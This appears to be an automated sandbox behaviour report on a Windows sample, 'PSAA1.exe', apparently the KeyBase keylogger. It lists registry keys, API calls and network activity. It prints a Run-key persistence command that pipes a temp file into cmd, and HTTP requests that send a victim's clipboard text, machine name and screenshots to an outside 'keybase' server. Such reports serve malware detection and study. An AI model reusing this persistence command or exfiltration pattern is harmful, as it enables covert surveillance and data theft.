HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DowncaseSpnCauseApiOwnerIsTooLazy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DowncaseSpnCauseApiOwnerIsTooLazy
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationOverwrite
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationOverwrite
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCacheTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCacheTtl
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxNegativeCacheTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxNegativeCacheTtl
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AdapterTimeoutLimit
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AdapterTimeoutLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ServerPriorityTimeLimit
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ServerPriorityTimeLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCachedSockets
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCachedSockets
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableMulticast
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastResponderFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastResponderFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastSenderFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastSenderFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastSenderMaxTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastSenderMaxTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsTest
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseCompartments
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\CacheAllCompartments
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseNewRegistration
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ResolverRegistration
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ResolverRegistrationOnly
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsQueryTimeouts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DnsQueryTimeouts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsQuickQueryTimeouts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DnsQuickQueryTimeouts
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\PrimaryDomainName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableAdapterDomainNameRegistration
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AdapterDomainName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\DisableAdapterDomainName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\Domain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\DhcpDomain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\DisableAdapterDomainName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\DisableDynamicUpdate
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\EnableAdapterDomainNameRegistration
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\Domain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\DhcpDomain
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\SearchList
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\SearchList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\NodeType
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\DhcpNodeType
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\ScopeId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\DhcpScopeId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\EnableProxy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\EnableDns
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.JScript,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration.Install,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\FinalizerActivityBypass
Write Keys
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\PSA HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\PSAA1_RASAPI32 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\EnableFileTracing HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\EnableConsoleTracing HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\FileTracingMask HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\ConsoleTracingMask HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\MaxFileSize HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\FileDirectory
Delete Keys
Nothing to display
Mutexes
Global\CLR_CASOFF_MUTEX Global\.net clr networking
Resolved APIs
advapi32.dll.RegOpenKeyExW advapi32.dll.RegQueryInfoKeyW advapi32.dll.RegEnumKeyExW advapi32.dll.RegEnumValueW advapi32.dll.RegCloseKey advapi32.dll.RegQueryValueExW kernel32.dll.FlsAlloc kernel32.dll.FlsFree kernel32.dll.FlsGetValue kernel32.dll.FlsSetValue kernel32.dll.InitializeCriticalSectionEx kernel32.dll.CreateEventExW kernel32.dll.CreateSemaphoreExW kernel32.dll.SetThreadStackGuarantee kernel32.dll.CreateThreadpoolTimer kernel32.dll.SetThreadpoolTimer kernel32.dll.WaitForThreadpoolTimerCallbacks kernel32.dll.CloseThreadpoolTimer kernel32.dll.CreateThreadpoolWait kernel32.dll.SetThreadpoolWait kernel32.dll.CloseThreadpoolWait kernel32.dll.FlushProcessWriteBuffers kernel32.dll.FreeLibraryWhenCallbackReturns kernel32.dll.GetCurrentProcessorNumber kernel32.dll.GetLogicalProcessorInformation kernel32.dll.CreateSymbolicLinkW kernel32.dll.EnumSystemLocalesEx kernel32.dll.CompareStringEx kernel32.dll.GetDateFormatEx kernel32.dll.GetLocaleInfoEx kernel32.dll.GetTimeFormatEx kernel32.dll.GetUserDefaultLocaleName kernel32.dll.IsValidLocaleName kernel32.dll.LCMapStringEx kernel32.dll.GetTickCount64 advapi32.dll.EventRegister mscoree.dll.#142 mscoreei.dll.RegisterShimImplCallback mscoreei.dll.OnShimDllMainCalled mscoreei.dll._CorExeMain shlwapi.dll.UrlIsW version.dll.GetFileVersionInfoSizeW version.dll.GetFileVersionInfoW version.dll.VerQueryValueW kernel32.dll.InitializeCriticalSectionAndSpinCount kernel32.dll.IsProcessorFeaturePresent msvcrt.dll._set_error_mode msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z kernel32.dll.FindActCtxSectionStringW kernel32.dll.GetSystemWindowsDirectoryW mscoree.dll.GetProcessExecutableHeap mscoreei.dll.GetProcessExecutableHeap mscorwks.dll._CorExeMain mscorwks.dll.GetCLRFunction advapi32.dll.RegisterTraceGuidsW advapi32.dll.UnregisterTraceGuids advapi32.dll.GetTraceLoggerHandle advapi32.dll.GetTraceEnableLevel advapi32.dll.GetTraceEnableFlags advapi32.dll.TraceEvent mscoree.dll.IEE mscoreei.dll.IEE mscorwks.dll.IEE mscoree.dll.GetStartupFlags mscoreei.dll.GetStartupFlags mscoree.dll.GetHostConfigurationFile mscoreei.dll.GetHostConfigurationFile mscoreei.dll.GetCORVersion mscoree.dll.GetCORSystemDirectory mscoreei.dll.GetCORSystemDirectory_RetAddr mscoreei.dll.CreateConfigStream ntdll.dll.RtlUnwind kernel32.dll.IsWow64Process advapi32.dll.AllocateAndInitializeSid advapi32.dll.OpenProcessToken advapi32.dll.GetTokenInformation advapi32.dll.InitializeAcl advapi32.dll.AddAccessAllowedAce advapi32.dll.FreeSid kernel32.dll.AddVectoredContinueHandler kernel32.dll.RemoveVectoredContinueHandler advapi32.dll.ConvertSidToStringSidW shell32.dll.SHGetFolderPathW kernel32.dll.GetWriteWatch kernel32.dll.ResetWriteWatch kernel32.dll.CreateMemoryResourceNotification kernel32.dll.QueryMemoryResourceNotification kernel32.dll.QueryActCtxW kernel32.dll.GetVersionExW kernel32.dll.GetFullPathNameW ole32.dll.CoInitializeEx cryptbase.dll.SystemFunction036 ole32.dll.CoGetContextToken advapi32.dll.CryptAcquireContextA advapi32.dll.CryptReleaseContext advapi32.dll.CryptCreateHash advapi32.dll.CryptDestroyHash advapi32.dll.CryptHashData advapi32.dll.CryptGetHashParam advapi32.dll.CryptImportKey advapi32.dll.CryptExportKey advapi32.dll.CryptGenKey advapi32.dll.CryptGetKeyParam advapi32.dll.CryptDestroyKey advapi32.dll.CryptVerifySignatureA advapi32.dll.CryptSignHashA advapi32.dll.CryptGetProvParam advapi32.dll.CryptGetUserKey advapi32.dll.CryptEnumProvidersA mscoree.dll.GetMetaDataInternalInterface mscoreei.dll.GetMetaDataInternalInterface mscorwks.dll.GetMetaDataInternalInterface mscorjit.dll.getJit kernel32.dll.GetUserDefaultUILanguage kernel32.dll.SetErrorMode kernel32.dll.GetFileAttributesExW mscoreei.dll.LoadLibraryShim culture.dll.ConvertLangIdToCultureName kernel32.dll.lstrlen kernel32.dll.lstrlenW mscoree.dll.ND_RI4 mscoreei.dll.ND_RI4 bcrypt.dll.BCryptGetFipsAlgorithmMode kernel32.dll.VirtualProtect kernel32.dll.GlobalMemoryStatusEx kernel32.dll.GetEnvironmentVariableW kernel32.dll.SwitchToThread kernel32.dll.CloseHandle kernel32.dll.GetCurrentProcessId advapi32.dll.LookupPrivilegeValueW kernel32.dll.GetCurrentProcess advapi32.dll.AdjustTokenPrivileges kernel32.dll.OpenProcess psapi.dll.EnumProcessModules psapi.dll.GetModuleInformation psapi.dll.GetModuleBaseNameW psapi.dll.GetModuleFileNameExW kernel32.dll.GetProcAddress kernel32.dll.DebugActiveProcess kernel32.dll.WaitForDebugEvent kernel32.dll.ContinueDebugEvent kernel32.dll.DeleteFileA advapi32.dll.SetKernelObjectSecurity advapi32.dll.GetKernelObjectSecurity ntdll.dll.NtSetInformationProcess ntdll.dll.NtProtectVirtualMemory ntdll.dll.NtQuerySystemInformation kernel32.dll.GetModuleFileNameW shfolder.dll.SHGetFolderPathW kernel32.dll.CopyFileW kernel32.dll.LocalFree kernel32.dll.CreatePipe kernel32.dll.DuplicateHandle kernel32.dll.GetStdHandle kernel32.dll.GetCurrentDirectoryW kernel32.dll.CreateProcessW kernel32.dll.GetFileType kernel32.dll.GetConsoleCP kernel32.dll.GetACP kernel32.dll.UnmapViewOfFile kernel32.dll.GetConsoleOutputCP kernel32.dll.WriteFile ole32.dll.CoUninitialize kernel32.dll.CreateActCtxW kernel32.dll.AddRefActCtx kernel32.dll.ReleaseActCtx kernel32.dll.ActivateActCtx kernel32.dll.DeactivateActCtx kernel32.dll.GetCurrentActCtx advapi32.dll.EventUnregister kernel32.dll.SetThreadUILanguage kernel32.dll.SortGetHandle kernel32.dll.SortCloseHandle kernel32.dll.CopyFileExW kernel32.dll.IsDebuggerPresent kernel32.dll.SetConsoleInputExeNameW ntdll.dll.NtQueryInformationProcess kernel32.dll.GetTempPathW kernel32.dll.CreateFileW uxtheme.dll.ThemeInitApiHook user32.dll.IsProcessDPIAware mscoree.dll.ND_RU1 mscoreei.dll.ND_RU1 kernel32.dll.LocalAlloc kernel32.dll.lstrlenA kernel32.dll.RtlMoveMemory cryptsp.dll.CryptAcquireContextW cryptsp.dll.CryptCreateHash cryptsp.dll.CryptHashData cryptsp.dll.CryptGetHashParam cryptsp.dll.CryptDestroyHash user32.dll.GetForegroundWindow user32.dll.GetWindowTextW kernel32.dll.GetCurrentThread kernel32.dll.GetCurrentThreadId user32.dll.RegisterWindowMessageW user32.dll.GetSystemMetrics kernel32.dll.GetModuleHandleW user32.dll.DefWindowProcW gdi32.dll.GetStockObject user32.dll.RegisterClassW ole32.dll.OleInitialize ole32.dll.CoTaskMemAlloc ole32.dll.CoTaskMemFree user32.dll.CreateWindowExW user32.dll.SetWindowLongW user32.dll.GetWindowLongW user32.dll.CallWindowProcW user32.dll.GetClientRect user32.dll.GetWindowRect user32.dll.GetParent ole32.dll.CoRegisterMessageFilter user32.dll.PeekMessageW user32.dll.WaitMessage ole32.dll.OleGetClipboard ole32.dll.CoGetObjectContext sechost.dll.LookupAccountNameLocalW advapi32.dll.LookupAccountSidW sechost.dll.LookupAccountSidLocalW cryptsp.dll.CryptGenRandom ole32.dll.NdrOleInitializeExtension ole32.dll.CoGetClassObject ole32.dll.CoGetMarshalSizeMax ole32.dll.CoMarshalInterface ole32.dll.CoUnmarshalInterface ole32.dll.StringFromIID ole32.dll.CoGetPSClsid ole32.dll.CoCreateInstance ole32.dll.CoReleaseMarshalData ole32.dll.DcomChannelSetHResult rpcrtremote.dll.I_RpcExtInitializeExtensionPoint user32.dll.GetDC user32.dll.EnumDisplayMonitors user32.dll.GetMonitorInfoW gdi32.dll.GetDeviceCaps user32.dll.ReleaseDC user32.dll.GetProcessWindowStation user32.dll.GetUserObjectInformationA kernel32.dll.CreateEventW kernel32.dll.SetConsoleCtrlHandler user32.dll.GetClassInfoW kernel32.dll.SetEvent user32.dll.MsgWaitForMultipleObjectsEx kernel32.dll.GlobalLock kernel32.dll.GlobalUnlock kernel32.dll.GlobalFree kernel32.dll.GetComputerNameW kernel32.dll.FindAtomW kernel32.dll.AddAtomW mscoree.dll.LoadLibraryShim gdiplus.dll.GdiplusStartup user32.dll.GetWindowInfo user32.dll.GetAncestor user32.dll.GetMonitorInfoA user32.dll.EnumDisplayDevicesA gdi32.dll.ExtTextOutW gdi32.dll.GdiIsMetaPrintDC gdiplus.dll.GdipCreateBitmapFromScan0 gdiplus.dll.GdipGetImagePixelFormat gdiplus.dll.GdipGetImageGraphicsContext gdi32.dll.GetCurrentObject gdiplus.dll.GdipGetDC gdi32.dll.BitBlt gdiplus.dll.GdipReleaseDC gdiplus.dll.GdipGetImageEncodersSize gdiplus.dll.GdipGetImageEncoders gdiplus.dll.GdipSaveImageToFile kernel32.dll.GetFileSize kernel32.dll.ReadFile windowscodecs.dll.DllGetClassObject mscoree.dll.ND_RI2 mscoreei.dll.ND_RI2 kernel32.dll.WerRegisterMemoryBlock oleaut32.dll.#8 oleaut32.dll.#9 oleaut32.dll.#10 rasapi32.dll.RasEnumConnectionsW rtutils.dll.TraceRegisterExA rtutils.dll.TracePrintfExA sechost.dll.OpenSCManagerW sechost.dll.OpenServiceW sechost.dll.QueryServiceStatus sechost.dll.CloseServiceHandle ws2_32.dll.WSAStartup ws2_32.dll.WSASocketW ws2_32.dll.setsockopt ws2_32.dll.WSAEventSelect ws2_32.dll.ioctlsocket ws2_32.dll.closesocket advapi32.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW kernel32.dll.CreateFileMappingW kernel32.dll.MapViewOfFile kernel32.dll.VirtualQuery kernel32.dll.ReleaseMutex advapi32.dll.CreateWellKnownSid kernel32.dll.CreateMutexW kernel32.dll.WaitForSingleObject kernel32.dll.OpenMutexW kernel32.dll.GetProcessTimes ws2_32.dll.WSAIoctl kernel32.dll.FormatMessageW rasapi32.dll.RasConnectionNotificationW advapi32.dll.RegOpenCurrentUser advapi32.dll.RegNotifyChangeKeyValue sechost.dll.NotifyServiceStatusChangeA winhttp.dll.WinHttpGetIEProxyConfigForCurrentUser kernel32.dll.ResetEvent ole32.dll.CoWaitForMultipleHandles iphlpapi.dll.GetNetworkParams dnsapi.dll.DnsQueryConfig iphlpapi.dll.GetAdaptersAddresses iphlpapi.dll.GetIpInterfaceEntry iphlpapi.dll.GetBestInterfaceEx ws2_32.dll.inet_addr ws2_32.dll.getaddrinfo ws2_32.dll.freeaddrinfo ws2_32.dll.WSAConnect ws2_32.dll.send ws2_32.dll.recv ws2_32.dll.shutdown ws2_32.dll.select kernel32.dll.DeleteFileW user32.dll.TranslateMessage user32.dll.DispatchMessageW user32.dll.PostMessageW gdiplus.dll.GdipDeleteGraphics gdiplus.dll.GdipDisposeImage
Execute Commands
"cmd" "C:\Users\Seven01\Desktop\PSAA1.exe" reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "PSA" /d "cmd /c type "C:\Users\Seven01\AppData\Local\Temp\PSA.txt" | cmd"
Started Services
Nothing to display
Created Services
Nothing to display
| Behavior analysis details | |||||
|---|---|---|---|---|---|
| Machine name | Machine label | Machine manager | Started | Ended | Duration |
| Seven02_64 | Seven02_64 | VirtualBox | 2018-02-22 00:02:30 | 2018-02-22 00:05:21 | 171 |
22 HTTP Request(s) detected
http://settings.platinumistabul.com/keybase/post.php?type=clipboard&machinename=SEVEN02-PC&windowtitle=&clipboardtext=nepituorarcesrnreidmshaspnhdmilfriesets%20twreiaar%20togyddohacgotmcotu%20moebofyaohpp%20olr%20tieasdho%20ptletbsoi%20oegdcelfgdocslhseooarai%20fteh%20pi%20ddsh%20ldreim%20oeb%20eo%20trheotyeal%20etuhrihdl%20%20hishewimsdlefd%20utpaneeeiaildeihdih%20%20hien%20ninagrerearoondpdaeepc%20aheomhmgeoacu%20tahnoe%20uhooetpnsruelitiowle%20eehiehlhreiweeeecatetidreealilwiii%20tdoagbstehnrtogoe%20oeanhoclntihhourre%20gimo%20mot%20ogrlawlachbtrahfo%20%20seytcedsdpstta%20rllrn%20c%20olitgu%20hyaiowmnewnelhstwdmliliu%20wdngoityhghuoohrisfi%20pebdroddnnhnahahns%20ytalbhrabalddtngautoaibndntudeldh%20gthdaon%20eoeosusraaeawdg%20dmoyathmt%20%20aehdr%20gresetie%20a&machinetime=3.04
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
GET /keybase/post.php?type=clipboard&machinename=SEVEN02-PC&windowtitle=&clipboardtext=nepituorarcesrnreidmshaspnhdmilfriesets%20twreiaar%20togyddohacgotmcotu%20moebofyaohpp%20olr%20tieasdho%20ptletbsoi%20oegdcelfgdocslhseooarai%20fteh%20pi%20ddsh%20ldreim%20oeb%20eo%20trheotyeal%20etuhrihdl%20%20hishewimsdlefd%20utpaneeeiaildeihdih%20%20hien%20ninagrerearoondpdaeepc%20aheomhmgeoacu%20tahnoe%20uhooetpnsruelitiowle%20eehiehlhreiweeeecatetidreealilwiii%20tdoagbstehnrtogoe%20oeanhoclntihhourre%20gimo%20mot%20ogrlawlachbtrahfo%20%20seytcedsdpstta%20rllrn%20c%20olitgu%20hyaiowmnewnelhstwdmliliu%20wdngoityhghuoohrisfi%20pebdroddnnhnahahns%20ytalbhrabalddtngautoaibndntudeldh%20gthdaon%20eoeosusraaeawdg%20dmoyathmt%20%20aehdr%20gresetie%20a&machinetime=3.04 HTTP/1.1 Host: settings.platinumistabul.com Connection: Keep-Alive
http://settings.platinumistabul.com/keybase/image/upload.php
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
POST /keybase/image/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d579a12236c124 Host: settings.platinumistabul.com Content-Length: 627925 Expect: 100-continue
http://settings.platinumistabul.com/keybase/image/upload.php
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
POST /keybase/image/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d579ac845f225a Host: settings.platinumistabul.com Content-Length: 627941 Expect: 100-continue
http://settings.platinumistabul.com/keybase/image/upload.php
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
POST /keybase/image/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d579b7d598aec4 Host: settings.platinumistabul.com Content-Length: 627944 Expect: 100-continue
http://settings.platinumistabul.com/keybase/image/upload.php
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
POST /keybase/image/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d579c337c095e8 Host: settings.platinumistabul.com Content-Length: 627943 Expect: 100-continue Connection: Keep-Alive
http://settings.platinumistabul.com/keybase/image/upload.php
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
POST /keybase/image/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d579c62edf17b2 Host: settings.platinumistabul.com Content-Length: 627944 Expect: 100-continue
http://settings.platinumistabul.com/keybase/image/upload.php
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
POST /keybase/image/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d579d19cb25c76 Host: settings.platinumistabul.com Content-Length: 627944 Expect: 100-continue Connection: Keep-Alive
http://settings.platinumistabul.com/keybase/image/upload.php
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
POST /keybase/image/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d579dd0b1cb11a Host: settings.platinumistabul.com Content-Length: 627941 Expect: 100-continue
http://settings.platinumistabul.com/keybase/image/upload.php
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
POST /keybase/image/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d579e879d9e0ae Host: settings.platinumistabul.com Content-Length: 627941 Expect: 100-continue Connection: Keep-Alive
http://settings.platinumistabul.com/keybase/image/upload.php
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
POST /keybase/image/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d579eb7de9c602 Host: settings.platinumistabul.com Content-Length: 627941 Expect: 100-continue Connection: Keep-Alive
http://settings.platinumistabul.com/keybase/image/upload.php
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
